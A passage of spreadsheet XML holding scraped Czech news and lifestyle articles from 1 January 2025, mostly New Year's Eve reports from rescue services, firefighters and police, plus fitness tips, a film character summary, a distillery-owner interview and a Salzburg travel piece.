    <t>Hasiče na konci roku zaměstnaly hořící popelnice, ale i požár bytu v Příbrami 1. ledna 2025 (10:04) foto: HZS Středočeského kraje / Profesionální hasiči z Kladna , dobrovolná jednotka Žilina a podnikový hasiči Správy železnic z Kralup nad Vltavou likvidovali požár drážního domku. Před půlnocí museli hasiči likvidovat oheň v bytě. Jedna osoba skončila v péči záchranářů. Silvestrovské oslavy ve středních Čechách poznamenaly častější úrazy od zábavní pyrotechniky. Záchranáři zasahovali u šesti zraněných a čtyř popálených, což je více než loni. "Proti loňskému silvestru výrazně přibylo i pacientů, které zmohl alkohol . První výjezd v souvislosti se zábavní pyrotechnikou měla posádka z Kolína pět minut po půlnoci," řekla mluvčí krajské záchranné služby Monika Nováková. Během oslav zasahovali záchranáři u šesti pacientů, kteří se zranili zábavní pyrotechnikou, a čtyř lidí popálených od pyrotechniky. V péči skončilo 46 lidí s intoxikací alkoholem . Rušnou noc měli především krajští hasiči. Za celé úterý do 23:00 zaznamenali 61 mimořádných událostí, z toho 27 požárů a 21 technických pomocí. V Příbrami dokonce vyjížděli profesionální hasiči i několik jednotek dobrovolných hasičů k požáru bytu. "Požár jsme měli nahlášený skoro čtvrt hodiny před půlnocí. Jednu osobu jsme předali zdravotníkům, protože se zřejmě nadýchala zplodin," přiblížil zásah v Příbrami mluvčí středočeských hasičů Tomáš Bakalář. Hasiči zasahovali v bytě s dýchacími přístroji a byt pak museli opustit, aby se pomocí vodních proudů provedla likvidace požáru. Ta skončil pouhých 16 minut po půlnoci. "Předběžně byla vyčíslena škoda na půl milionu korun, ale zásahem se uchránily další hodnoty za zhruba 20 milionů. "Co způsobilo požár, v tuto chvíli nejde říct, probíhá šetření na místě," dodal hasič. Požár bytu byl prakticky největší událostí, u které poslední den v roce museli hasiči zasahovat. Jinak mají na kontě drobnější zásahy jako jsou hořící kartony od pyrotechniky, popelnice apod. V jednom případě poskytovali technickou pomoc při úniku plynu kvůli narušené přípojce v Příbrami . Celkem středočeští hasiči od 23 hodiny posledního dne roku do dnešních 1:00 hodin zasahovali u téměř 30 mimořádných událostí. Ve 22 případech to byly právě požáry. Na Kladensku ale už kolem 21:00 likvidovali požár drážního domku v Kamenných Žehrovicích. Pomocí navijáku museli strhnou plechovou střechu, aby se dostali i ke skrytým ohniskům.</t>
  </si>
  <si>
    <t>4840</t>
  </si>
  <si>
    <t>20250101_238_3695162472_a4266e6115498ecb82e0.html</t>
  </si>
  <si>
    <t>a4266e6115498ecb82e0</t>
  </si>
  <si>
    <t>Policisté: silvestrovské oslavy v kraji bez mimořádných událostí</t>
  </si>
  <si>
    <t>Policisté: silvestrovské oslavy v kraji bez mimořádných událostí 1.1. 2025 MS KRAJ - Z pohledu bezpečnosti a veřejného pořádku nezaznamenali moravskoslezští policisté v kraji na přelomu roku mimořádnou nebo výjimečnou událost. Nárůst přijatých oznámení začal tradičně po půlnoci. Policisté řešili případy výtržností i narušení veřejného pořádku, zaznamenali fyzická napadání, jak v bytech, barech, restauracích i ve venkovním prostředí. V mnoha případech hrál svou roli alkohol . „ Kolem půlnoci a v prvních chvílích nového roku si prim v oznámeních na linku 158 držela jednoznačně volání ohledně rušení nočního klidu a používání pyrotechniky,“ uvedla mluvčí Soňa Štětínská. Policisté také asistovali u výjezdů zdravotníků a hasičů. Pro představu: Policie ČR řeší v průběhu roku za den přes 300 věcí, přičemž za prvních pět hodin roku letošního bylo zhruba 210 těchto výjezdů a reakcí. Rekordmanem byla první hodina, kdy policisté řešili 75 událostí. Žádnou výjimečnou či mimořádnou událost oproti běžnému silvestrovskému dění v Bohumíně nezaznamenali ani místní strážníci. (rzp) Autor: Město Bohumín Rubrika transition_slide informace,město,bohumín</t>
  </si>
  <si>
    <t>20250101_239_3696142900_199402b0f5f12d2e6eed.html</t>
  </si>
  <si>
    <t>199402b0f5f12d2e6eed</t>
  </si>
  <si>
    <t>Leden je plný novoročních předsevzetí</t>
  </si>
  <si>
    <t>Leden je plný novoročních předsevzetí Novoroční předsevzetí jako přestat kouřit, omezit alkohol , méně se stresovat, zdravě jíst, začít sportovat nebo zhubnout. Pokud v posilovně nebo s cvičením obecně začínáte, dejte si pozor na nejčastější chyby, kterých byste se mohli dopouštět. Chystáte se začátkem nového roku opřít do fitness? Pozor za na časté chyby začátečníků Špatná technika a intenzita Častou chybou začátečníků ve fitness je, že nedodržují správnou techniku. Mnoho cviků pak provádějí chybně, což jim brání v dosažení progresu a co také může ohrozit jejich zdraví. Je důležité dodržovat správnou techniku a zapojovat správné svalové partie. Další chybou je nedostatek intenzity. Jedná se cvičení příliš lehce nebo příliš těžce, což neumožňuje spalovat tuky, budovat svaly nebo zlepšovat kondici. Je důležité cvičit v optimální tréninkové zóně, která závisí na vaší maximální tepové frekvenci. Nedostatečná variabilita cviků Začátečníci často zatěžují omezený počet partií, a tedy celé tělo posilují nerovnoměrně. Výsledek cvičení pak je jen částečný. Pokud budete dělat stejnou rutinu zase a znovu, vaše tělo si navíc zvykne. A zatímco v začátcích jste zažili pokrok, časem ustrnete. Proto je vhodné každých pár týdnů změnit rutinu cvičení, abyste tělo překvapili něčím novým. Nejen, že tak budete své tělo motivovat k novým cílům, ale zabráníte také tomu, abyste se začali nudit. Chybějící plán Jednou z největších fitness chyb, kterou začátečníci dělají, je absence plánu. Většinou se ztraceně toulají po tělocvičně a přemýšlejí, na co se který stroj používá. Pak k některému sednou a provedou několik opakování s nepromyšleně zvolenou zátěží. Bez precizního plánu nikdy nedosáhnete svého cíle. Bez systému a řádu, který byste měli dodržovat, se k ničemu nedopracujete, jen plýtváte časem a energií. Moc vysoké cíle Stanovování vysokých cílů vás může výrazně brzdit. Ve fitku platí pravidlo – krůček po krůčku. Měli byste si proto stanovit cíle, kterých můžete reálně dosáhnout na základě své aktuální kondice. Bez ohledu na to, zda chcete zhubnout 20 kilo nebo přeměnit tuk na svaly. K těmto cílům se budete muset propracovat postupně. Proto je důležité si vše rozdělit do menších kroků, ale o to lépe dosažitelných cílů. Podcenění oblečení a vybavení Pokud to s fitness myslíte vážně, vyplatí se dbát na oblečení i obuv a investovat do kvalitního sportovního vybavení. „Funkční tričko, vhodné sportovní spodní prádlo a ponožky jsou ideální pro odvádění potu a zároveň zachování teplotního komfortu. Spodní prádlo ze syntetických materiálů je ideální v případě intenzivního zátěžovému cvičení jako jsou kruhové či silové tréninky, fitness obecně či běhání nebo cyklistika. Funkční syntetické materiály totiž odvádějí vlhkost a udržují pokožku v suchu,“ říká Ruslan Skopal ze specializovaného e-shopu Trenýrkárna.cz a dodává: „Co se týče střihu, záleží na každém, pro jaký se rozhodne. Pro ženy, kterým nejsou ani v běžném životě pohodlná tanga, nejsou vhodná ani při sportu. Spodní prádlo by vás nemělo stahovat, ale ani by nemělo být příliš volné.„ Nezapomínejte ani na vhodnou obuv. Správné boty vám totiž pomohou s koordinací, ale také zlepší tréninkové výsledky, usnadní provádění mnohých cviků či zdokonalí jejich technické provedení nebo i zvýší výkon. Podcenění křečí Křeče spojené s pohybovou aktivitou (tzv. EAMC – Exercise-Associated Muscle Cramps) jsou lokální svalové kontrakce kosterního svalu či celé svalové skupiny. Přicházejí v průběhu či těsně po sportovním výkonu. Postihují nejčastěji svaly na stehnech a lýtkový sval. Nepříjemné jsou zejména, protože způsobují nejen chvilkovou, ale i několikadenní bolestivost. Nejčastěji jsou křeče způsobeny nedostatečným protažením a zahřátím svalů před sportovním výkonem. Právě nedostatečná příprava a podcenění zahřátí svalů může způsobit jejich přetížení a křeče. Mezi další příčiny pak patří nadměrné namáhání svalů, příliš intenzivní trénink, přetížení a často opakované pohyby. „Další příčinou je dehydratace, nedostatečný příjem tekutin během sportovního výkonu, který může vést k nerovnováze elektrolytů a způsobit svalové křeče. V neposlední řadě je to také nedostatek minerálů. Nízká hladina draslíku, vápníku nebo hořčíku v těle je také často další příčinou. Ideální je do těla hořčík dostávat v nápojích, vhodným řešením je obohatit vodu, kterou pijeme každý den. Řešením jsou moderní filtry kohoutkové vody, které lze jednoduše pořídit domů, a které kromě eliminace nečistot či bakterií přidají do vody právě hořčík a další minerály,“ říká Jaroslav Žák z BWT. Špatný jídelníček Velmi častým opomenutím fitness začátečníků je podcenění důležitosti změny stravovacích návyků a úpravy jídelníčku. Ale bez toho to nepůjde. I to, co se totiž zdá být relativně zdravé, nemusí být výživově v pořádku. Proteiny mohou pomoci budovat svalovou hmotu a při úsilí zhubnout, ale většinou jich sníte příliš mnoho a ignorujete další klíčové živiny, jako jsou celozrnné výrobky a tuky. Důležité je se kromě sacharidů, bílkovin a tuku soustředit také na konzumaci vitamínů a minerálů, které jsou nezbytné. Jednoduše, pokud chcete dosáhnout maximálních výsledků, obraťte se na trenéra nebo výživového experta, který vám nastaví jídelníček vhodný vašemu tréninkovému plánu. Klára Procházková Autor: Redakce</t>
  </si>
  <si>
    <t>346</t>
  </si>
  <si>
    <t>20250101_24_3697871292_2657056a06bfb7f35675.html</t>
  </si>
  <si>
    <t>2657056a06bfb7f35675</t>
  </si>
  <si>
    <t>Bohumil Stejskal - Dědictví aneb Kurvahošigutntag</t>
  </si>
  <si>
    <t>Bohumil Stejskal - Dědictví aneb Kurvahošigutntag Externí Bolek Polívka na Kinobox Vzhled Bohouš měl dlouhé tmavé vlasy. Šaty nosil jako ostatní obyčejní lidé. Na nohou nosil nízké boty. Někdy měl na očích tmavé brýle. Pozor: Následující část textu může obsahovat vyzrazení děje a osudu postavy! Osobnost Bohouš měl velmi rád alkohol . Byl velmi línej, nechtělo se mu nic, pouze ležet v posteli. V místní hospodě přišel doktor Ulrich a oznámil mu, že zdědil velké peníze. Později se zjistilo, že ty peníze neměli být pro něj, protože byl nevlastní syn. Pak mu šel doktor Ulrich ukázat do Brna co mu patří. Bohouš jel nejdříve do cihelny a nadělal tam cirkus kvůli cihlám. Pak šli do potravin a tam také dělal hlouposti kvůli slivovici. Nakonec šli do restaurace a tam zas dělal problémy s číšníkem. No a pak už jen přišel opilý domu. Poté vzal všechny chlapy z vesnice do Brna na hostinu. O pár dní ho pozvali na setkání do Brna jedna firma co má zájem o jeho cihelnu. To Bohouš hned odmítl a šel si užívat do bordelu. Pak koupil kolotoč a vozil se na něm celý den a noc. Poté přišel doktor Ulrich a chtěl od něj zpět ty peníze, on mu samozřejmě nedal nic. Všichni ho začali ignorovat, jeho holky i jeho kamarádi. Jednou za nim přišel anděl a povídali si. Ten anděl, jen v lidské podobě, přišel za ním do hospody a tentokrát zdědil ještě více peněz a výsměšným tónem řekl: "tak a teď si vás kupim všechny". Blízcí 100% 1.1.2025 20:02 Nejlepší Polívkova role všech dob. To Bohušovo nářečí je skvělé, ale není divu, když je Bolek valašský rodák. Škoda, že Český lev se začal rozdávat až o rok později, protože Polívka by si ho určitě odnesl. „A teď si vás kúpím. Všecky.“ #553860 ''neser! nebo ti rozhodím sandál!'' #368702 "Co já dělal! Ona dělala, tož co sem měl dělat!" #315472 "Nevíš a nečteš, víš jaký je slunko sviňa?":D #179480</t>
  </si>
  <si>
    <t>6920</t>
  </si>
  <si>
    <t>20250101_240_3695162650_e402a645f3f629c44fc9.html</t>
  </si>
  <si>
    <t>e402a645f3f629c44fc9</t>
  </si>
  <si>
    <t>Během Silvestra v hradeckém kraji záchranáři nejčastěji řešili alkohol. Pyrotechniku jen výjimečně</t>
  </si>
  <si>
    <t>Během Silvestra v hradeckém kraji záchranáři nejčastěji řešili alkohol . Pyrotechniku jen výjimečně Silvestrovská noc každoročně patří mezi nejnáročnější pro hasiče i zdravotnické záchranáře. Letos to nebylo jinak. Operační středisko Zdravotnické záchranné služby Královéhradeckého kraje (ZZS) bylo proto personálně posíleno a nakonec odbavilo 116 tísňových volání. „Zatímco většina zásahů byla spojena s méně závažnými úrazy způsobenými odpalováním zábavní pyrotechniky, znepokojivým trendem zůstává vysoký počet intoxikací alkoholem ,“ uvedla pro novináře Lucie Hanušová , tisková mluvčí ZZS. Záchranáři vyjížděli k šesti takovým případům, včetně dvou dětských pacientů. Alkohol byl také příčinou deseti úrazů a šesti konfliktů, které skončily zraněním. První výjezd nového roku 2025 zaznamenali operátoři 18 minut po půlnoci, kdy záchranáři z trutnovské základny pomáhali pacientovi s popáleninou na zápěstí. Letecká záchranná služba měla poslední vzlet v roce 25. prosince, s celkovým počtem 858 vzletů za celý rok. „To je srovnatelné s předchozím rokem,“ dodává mluvčí. Policie v kraji od úterních 18:00 do dnešních 06:00 přijala okolo 190 oznámení, což bylo na úrovni loňského roku. V Hradci Králové na silvestra večer zajistili řidiče osobního auta, který měl v dechu dvě promile alkoholu . Zhruba dvě hodiny před silvestrovskou půlnocí pátrali po vozidle, které podle oznámení svědkyně mělo jet na dálnici D11 v protisměru. Hlídky úsek dálnice projely v obou směrech, ale vozidlo nenašly. Ani dálniční kamery jej nezachytily. Ve Špindlerově Mlýně , Skuhrově nad Bělou, Třebechovicích pod Orebem a v Mostku policie o silvestrovské noci pátrala po ztracených lidech. "Ve všech případech byli všichni po krátké chvíli nalezeni a všechna pohřešování měla šťastný konec," řekla novinářům mluvčí policie Karolína Macháčková . Autor: Petr Roubíček Autor person Petr Roubíček</t>
  </si>
  <si>
    <t>10810</t>
  </si>
  <si>
    <t>21810</t>
  </si>
  <si>
    <t>20250101_241_3702906871_557df870ab2935e44772.html</t>
  </si>
  <si>
    <t>557df870ab2935e44772</t>
  </si>
  <si>
    <t>Ruku na to. Jak se špičkový chirurg stal i majitelem rodinné palírny</t>
  </si>
  <si>
    <t>Ruku na to. Jak se špičkový chirurg stal i majitelem rodinné palírny Pohnout prsty, které měly navždy zůstat nehybné. Pozvednout sklenici k přípitku. Oba světy spojuje Igor Čižmář: profesor medicíny specializující se na chirurgii ruky – a zároveň majitel rodinného lihovaru. Skrze dveře, jejichž nízké zárubně upomínají na původ budovy v devatenáctém století, se line nenapodobitelná vůně. Pojí v sobě sladkost ovoce i dřinu v sadu, jemnost chuti i sílu alkoholu . To vše ke slivovici, meruňkovici či hruškovici patří, ušlechtilé destiláty jsou svého druhu svorníky protikladů. Tím spíš se hodí, kdo nás tu provází. A kdo vysvětluje, proč tu jsme. „Hrdě jsem si řekl: Ne, neprodám, já si to nechám. To byl zásadní zlom v mém životě,“ praví klidně a vyrovnaně Igor Čižmář. Pokud tedy chceme být přesní, tak prof. MUDr. Igor Čižmář, Ph.D. Člověk představující výjimku z pravidla, že k vrcholové medicíně se nepodniká v jiném oboru, což je pravidlo logické, vycházející z enormní náročnosti lékařské profese. Ale když do „destilačního kotle života“ přidáte dějinné zlomy, hrdost a pracovitost, může se to stát. Proto jsme v Lihovaru Sudlička v Hrobicích, téměř přesně na půli cesty mezi Pardubicemi a Hradcem Králové . Od kotlů a zásobníků přecházíme do místnosti, jíž dřívější majitelé říkali v souladu s hrubostí sobě vlastní „chlastací“. Komunisté si totiž – poručíme větru, dešti, slunci i lihovinám – naplánovali, že právě Hrobice budou centrem jejich alkoholového opojení, a vystavěli tu největší ovocný lihovar v rámci celé RVHP . Pro ty, kdo už s radostí zkratku zapomněli: Rada vzájemné hospodářské pomoci, ona smutná velká část světa za železnou oponou, živořící v nekonečné kocovině z nedostatku svobody. „Když jsem prostory přebíral, na půdě bylo až po kolena jalovce na borovičku. Později jsem si našel, že soudruzi jezdili dokonce i na průmyslovou špionáž po Evropě , ale ani oni to tu nikdy nevyužili na maximum,“ rozhlédne se Igor Čižmář po rozlehlém areálu. Zločinný režim padl a jemu se změnil život – proto spojuje zdánlivě nesouvisející. Profesor, akademik, špičkový chirurg. Lihovarník, podnikatel. Ty nejjednodušší a zároveň nejsložitější pohyby našich životů mohou nést jeho podpis. Nejen pozvednout sklenici k přípitku, ale také pohladit dítě prsty, jež měly zůstat navždy nehybné: profesor Čižmář jakožto specialista na horní končetinu jako jediný u nás operuje i tetraplegické pacienty, lidi s nevratným poškozením míchy, a tím pádem umlčenými končetinami. Viděl jsem, že nejen na úrazové chirurgii můžete ve velké nemocnici velmi rychle vyhořet. Z péče se stane fabrika, pásová výroba. A pacient už pro vás není jméno, jen diagnóza. V roce 2016 za to v anketě Lékař roku obdržel Hippokratovu cenu určenou tomu, „kdo prokázal nebo vykonal čin nebo činy lidskosti“. Byť sedíte proti člověku se silnou vnitřní vírou a se schopnostmi, které se pro nás laiky mohou blížit zázrakům, v tomto ohledu má jasno. Foto Michael Tomeš „Zázraky se nedějí,“ praví znovu klidně, leč zároveň přesvědčeně. „Ale osvojil jsem si jiné heslo: Kde nic není, i málo je hodně. Když tetraplegik najednou pohne prsty, může se třeba sám najíst. Nebo se vycévkovat. Nebo někoho pohladit. Pohnout zápěstím je najednou obrovská věc.“ V souvislosti s tím, čemu se celoživotně věnuje, se sluší dodat: Ruku na to. Igore, proč to děláš? Na každé pravidlo se najde výjimka, i na to, že ega profesorů medicíny vyplňují celou místnost – a že by při vysokých stropech Lihovaru Sudlička bylo kam stoupat. Igor Čižmář představuje opak, je radost s ním hovořit. O tom, kde má medicína své hranice. Nebo o doznání, že čím více se do ní noříte, tím spíš zjišťujete, kolik toho nevíte, i jako profesor chirurgie. Zmíněnou otázku si ale kladl v jiné souvislosti. „Všichni seděli doma a já se sem drkotal z Brna . Dlouho vlakem, až později velkopansky autem,“ vzpomíná na začátky své dvojité profesní dráhy. Po listopadu 1989 zdědil ještě jako student medicíny pozemky po babičce v Sudličkově Lhotě , které se hrdě rozhodl neprodat, vzpomněl si u toho na své předky zemědělce. Už jako lékař na pozemcích začal s pěstitelským pálením, mimochodem díky tomu, že tehdy titul MUDr. umožňoval provoz vázané živnosti. Původní rodinná půda však nestačila, tak přikoupil dnešní Lihovar Sudlička. Prostor zdevastovaný komunisty, bez odpovídajících technologií. Sem dojížděl a přemýšlel u toho. „Ty, Igore, proč to děláš?“ zeptá se i po letech, ale už jen řečnicky. Odpověď zná: „To, že jsem běžel i druhý svět, mi dávalo velkou svobodu rozhodování v medicíně, v akademické i fakultní. Nemusel jsem být poplatný byvším šéfům, protože ono samozřejmě platí, koho chleba jíš, toho píseň zpívej,“ říká. „Já jsem velký fanda autorit, ale musí to být pro mě opravdu autorita. Když jí někdo nebyl, tak jsem si z toho nemusel tak moc dělat. Věděl jsem, že bych se případně dokázal uživit i jinak,“ dodává. Lihovar totiž rostl. Člověk míní, příroda mění: když se zrovna neurodilo ovoce, a tím pádem přišel o odbyt z pěstitelského pálení, musel si i tak vydělat na provoz a platy zaměstnanců, proto se pustil do vlastních výrobků. Dnes pod značkou Sudlička prodává oceňované slivovice či meruňkovice, ale též ořechovku nebo tradiční kmínku, obě s glejtem Regionální potravina, neboť sází na české a co nejkvalitnější suroviny. Klokot destilačních strojů zároveň vždy zněl v pozadí. Mezitím stoupal v hierarchii medicíny, čtrnáct let vedl Traumacentrum Fakultní nemocnice Olomouc , stal se docentem, pak profesorem. A v rámci vnitřní poctivosti řešil, co souběh profesí znamená. „Měl jsem dvě vizitky – doktor a nedoktor,“ přiznává upřímně. „Ten druhý život jsem žil v uvozovkách v utajení, měl jsem špatné svědomí, že jako úrazový chirurg léčím i lidi, kteří byli pod vlivem alkoholu . I když jsem věděl, že neděláme nic nelegálního, že dodržujeme všechna pravidla, že vyrábíme kvalitní věci. Ani dnes nechodím a nechlubím se tím, neobdarovávám své kolegy naším alkoholem , to určitě ne. Ale už jsem dostatečně stár na to, abych se tím netrápil.“ Zvlášť teď, když Lihovar Sudlička sbírá ocenění, jeho roční obrat činí přibližně pětadvacet milionů korun a majitel ho chce rozvíjet dál. Věnuje mu pravidelně jeden den v týdnu, fakultní nemocnici totiž vyměnil za vlastní kliniku v domovském Brně, kde je pánem svého času. „Viděl jsem, že nejen na úrazové chirurgii můžete ve velké nemocnici velmi rychle vyhořet. Z péče se stane fabrika, pásová výroba. A pacient už pro vás není jméno, jen diagnóza,“ popisuje. „Plánoval jsem si, že skončím ve vlastní ambulanci, kde budu dál operovat ruku a bude mi dobře. Nakonec jsem trochu dál – na vlastní klinice s operačními sály.“ Hodně rozdílů, řada podobností. I lihovarnictví a medicína mají styčné body, například zásadní roli státu. „Je to velmi podobné. Tady jsme regulovaní hodnotou spotřební daně, která se v průběhu let zvyšuje. Medicína je pak státní zakázka regulovaná úhradovou vyhláškou,“ srovnává Igor Čižmář. Plus platí, že podnikání má spoustu základních pravidel bez ohledu na obory. „Od různých softwarových i hardwarových znalostí až po komunikaci s úřady. Ano, dalo mi to hodně. A hlavně tu svobodu. Majitelem jsem sám v lihovaru i na klinice. Zodpovědnost je jen jedna. Nechávám rád lidi rozhodovat na jejich pozicích, ale v celkové zodpovědnosti jsem sám já.“ Nyní je nutno zeptat se na jeho hlavní expertizu. V medicíně vnímám neustálé stesky. Netvrdím, že jsou neopodstatněné, ale někdy jich je víc, než jaká je realita. České zdravotnictví je stále v kvalitě péče světová špička, což ihned zdůrazní i Igor Čižmář. Seznam neduhů však roste, populace stárne, lékařů i sester ubývá… Stop! „Za sebe řeknu, že v medicíně vnímám neustálé stesky. Netvrdím, že jsou neopodstatněné, ale někdy jich je víc, než jaká je realita,“ začíná. „Já jsem nikdy neměl finanční ani personální nouzi. Jak ve fakultní nemocnici, tak teď na klinice.“ Což není v rozporu s tím, že změny jsou nutné. A on je umí pojmenovat. „Politici nemají odvahu říct, že když vyžadujete dřívější termín, lepší protézu, lepší implantát, stát nemá na to, dát všem to nejlepší a hi-tech. Léčba dnes nemá finanční strop.“ „Musíme najít standard, který bude pořád velmi pěkný, ale když budete chtít víc, budete si muset doplatit. Lidé si na to musejí zvyknout. Když se upřímně podíváte na to, kolik odvádíte do státní kasy na zdravotním pojištění, tak půjdete jednou na větší operační výkon a v ten moment jste na nule.“ Praktickým důsledkem tohoto pravdivého popisu reality je mimo jiné růst soukromého sektoru. Tím nejsou myšleny jen kliniky typu té jeho, ale i vstup největších byznysových jmen do oboru. „Vládne tady klišé, že medicína je poslání, ale tak to není, a už vůbec se na tom nedá stavět,“ říká Igor Čižmář. „Musíme si říct, že medicína je také byznys. Že všechno něco stojí, včetně stavby nemocnic, přístrojů a tak dále. To je první bod – uvědomit si, že nic není zadarmo. Druhým bodem bude najít onu hranici péče, protože nemáme všichni nárok na všechno.“ Najít balanc v péči o lidské zdraví je obzvlášť delikátní úkol. Medicína musí být byznys, nikoli však pouze byznys. „Kdybych to já bral čistě byznysově, udělám dalších deset ambulancí po republice, ale také pak budu mít personální problém, který toho času nemám,“ nabízí praktický příklad. Foto Michael Tomeš „Koncentruji u sebe lidi, kteří opravdu něco umějí, a tím pádem k nám pacienti chodí, protože vědí, že dokážeme poskytnout specializovanou péči. Nikdy jsem nechápal, že má někdo běžnou objednací dobu až za několik měsíců – to jsem si vždy říkal, že je něco špatně v organizaci. A nesouhlasím s tím. Proto jsem si to zařídil tak, abychom byli schopni pokrýt pacienty z hlediska dostupnosti péče do měsíce.“ Svoboda se pojí se zodpovědností a výsledkem rovnice je schopnost sám o sobě rozhodovat. Na klinice i v podnikání. Proto v Lihovaru Sudlička nikdy neuhnul k levnější a masovější výrobě. A s respektem říká: „Cítím, že trendem jsou drinky, případně nealkoholické nápoje, tímto směrem chceme mířit také. My jsme jinak takové skleníkové kytičky, které žijí ve své ulitě, neznám se s ostatními lihovarníky. Děláme to pro ty lidi, kteří smýšlejí stejně jako my. A to nejlépe, jak umíme,“ nastiňuje svůj přístup. Stejně, jako to činí celý život s chirurgickými nástroji v ruce. Něco přesto jiné je. Čím více času strávíte u destilačních kotlů, tím ušlechtilejší a pitelnější by měl být výsledek. Jenže čím déle se věnujete péči o lidské tělo, tím víc roste množina neznámého. „Třeba jaká je role genů oproti životnímu stylu. Například máme každý subjektivně zcela rozdílné vnímání bolesti,“ zmiňuje profesor Čižmář situace, kdy lidé se zjevnými deformitami kloubů na rukou ani nepřijdou do jeho ordinace, zatímco ti s papírově mnohem méně vážnou diagnózou nesnesitelně trpí. U podobných otázek se nejspíš nikdy nedobereme odpovědí, přesto je nutné zkoušet je hledat. Stejně jako je nutné hledat oblasti, kde i málo může být hodně. Ruku na to. Autor: Miroslav Němý Autor Miroslav Němý</t>
  </si>
  <si>
    <t>20250101_242_3695969494_a4f82f4bf6c6d1002ec8.html</t>
  </si>
  <si>
    <t>a4f82f4bf6c6d1002ec8</t>
  </si>
  <si>
    <t>Osm lidí se v Moravskoslezském kraji zranilo při odpalování pyrotechniky</t>
  </si>
  <si>
    <t>Osm lidí se v Moravskoslezském kraji zranilo při odpalování pyrotechniky Osm lidí se v Moravskoslezském kraji zranilo během silvestrovské noci při odpalování pyrotechniky. Celkem mají záchranáři v regionu za sebou rušnou noc. Nárůst počtu zásahů byl více než dvojnásobný oproti běžným nocím. „Během novoročních oslav zasahovali záchranáři u osmi případů vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny,“ řekl mluvčí moravskoslezských záchranářů Lukáš Humpl. Dvacetiletý mladík se například zranil v Havířově při odpalování ohňostroje asi 15 minut po půlnoci. Když po zapálení knotu nenastala exploze, pokusil se pyrotechniku znovu zapálit. „V té chvíli došlo k explozi. Muž byl se zraněním hlavy předán zdravotníkům. Mladík zřejmě nerespektoval pokyny z návodu na použití, nedbal opatrnosti při manipulaci s pyrotechnikou,“ doplnila mluvčí moravskoslezské policie Soňa Štětínská. Zábavní pyrotechnika (ilustrační foto) | foto: Shutterstock Od silvestrovského do novoročního rána vyjížděly posádky sanitek ve více než 400 případech. „Jen od silvestrovské půlnoci do dnešního rána záchranáři ošetřovali 111 pacientů. Nárůst zásahů v těchto hodinách byl více než dvojnásobný oproti běžným nocím,“ uvedl Humpl. Dodal, že asi 50 lidí utrpělo úrazy. „Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci byla pod zjevným vlivem alkoholu , což je obdobný počet jako v uplynulých letech. Další zhruba tři desítky ošetřovaných osob posádkám uvedly, že byly napadeny a zraněny jinou osobou nebo utrpěly poranění při potyčkách,“ vyjmenoval. Dodal, že s diagnózou opilosti či těžké opilosti muselo být v kraji záchrannou službou během silvestrovského večera a noci ošetřeno 16 osob. Autor: zdroj: | ČTK Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>2820</t>
  </si>
  <si>
    <t>20250101_243_3695199961_69284f9decde920dc914.html</t>
  </si>
  <si>
    <t>69284f9decde920dc914</t>
  </si>
  <si>
    <t>Město, kde hudba nikdy neutichá: Objevte krásy Salcburku</t>
  </si>
  <si>
    <t>Město, kde hudba nikdy neutichá: Objevte krásy Salcburku 1. ledna 2025 3 minuty čtení Nad řekou Salzach se tyčí středověká pevnost, pod ní se krčí barokní věže kostelů a mezi nimi se proplétají křivolaké uličky starého města. Salcburk je jako vystřižený z pohlednice – a v zimě to platí dvojnásob. Možná proto sem míří tolik návštěvníků i mimo hlavní sezónu. Obsah Zima ve starém městě Pevnost nad městem Ve městě hudby Rakouské dobroty Zima ve starém městě Když napadne sníh, historické centrum se promění v zimní pohádku. Davy turistů prořídnou a město se zklidní. Je to nejlepší čas vydat se na průzkum úzkých uliček UNESCO památky. Můžete bloumat bez cíle, zastavit se na svařák nebo horkou čokoládu, nebo se jen kochat výzdobou historických domů. A jestli vám vyhládne, zajděte na pravý jablečný štrúdl – lepší už ochutnáte jen ve Vídni . Pevnost nad městem Hohensalzburg je nepřehlédnutelná. Tenhle středověký kolos patří k největším hradům v Evropě a na Salcburk dohlíží už devět století. Původně sloužil jako pevnost, později jako vězení a kasárna. Dnes sem míří hlavně turisté – a není divu. Výhled z hradeb bere dech. Červené střechy domů kontrastují se zasněženými vrcholky Alp a člověk má celé město jako na dlani. Nahoru se dá vyjet pohodlně lanovkou. Ve městě hudby Mozart je v Salcburku všudypřítomný. Jeho rodný dům v Getreidegasse je jen začátek – koncerty zní v divadlech, kostelech i na ulicích. V létě město ožívá slavným festivalem Salzburger Festspiele, ale klasická hudba tu zní celoročně. A když vás už bolí nohy z chození, zajděte do cukrárny Furst na pravé Mozartovy koule. Tyhle čokoládové bonbóny s marcipánem a nugátem chutnají úplně jinak než jejich průmyslově vyráběné napodobeniny. Rakouské dobroty Salcburk ale není jen o Mozartovi. Místní hospody lákají na pořádné porce řízků, domácí knedlíky a další rakouské speciality. V kavárnách starého města voní káva a domácí moučníky. A kdo má rád pivo , může ochutnat místní značky v některém z tradičních pivních sklepů. Večerní procházka po nábřeží Salzachu má zvláštní kouzlo. Nasvícená pevnost se zrcadlí ve vodě, z kostelů se line zvonění a člověk má pocit, že se vrátil v čase. Není divu, že se sem lidé rádi vracejí. Salcburk je zkrátka město, které si vás získá – hudbou, jídlem, nebo prostě jen tou zvláštní atmosférou, která tu vládne na každém kroku. Zdroj: https://www.britannica.com/place/Salzburg-Austria Přihlašte se k odběru našeho newsletteru a získejte novinky o cestování přímo na váš e-mail. O autorovi Autor: Lenka Němcová Autor person Lenka Němcová Rubrika transition_slide Cestování</t>
  </si>
  <si>
    <t>280</t>
  </si>
  <si>
    <t>270</t>
  </si>
  <si>
    <t>20250101_244_3695114456_915378341b58157d4c93.html</t>
  </si>
  <si>
    <t>915378341b58157d4c93</t>
  </si>
  <si>
    <t>Silvestrovská noc záchranářů. V Budějovicích muž v potoce, v Prachaticích mladistvý opilec skončil v nemocnici. Ke zranění pyrotechnikou došlo na Lipně</t>
  </si>
  <si>
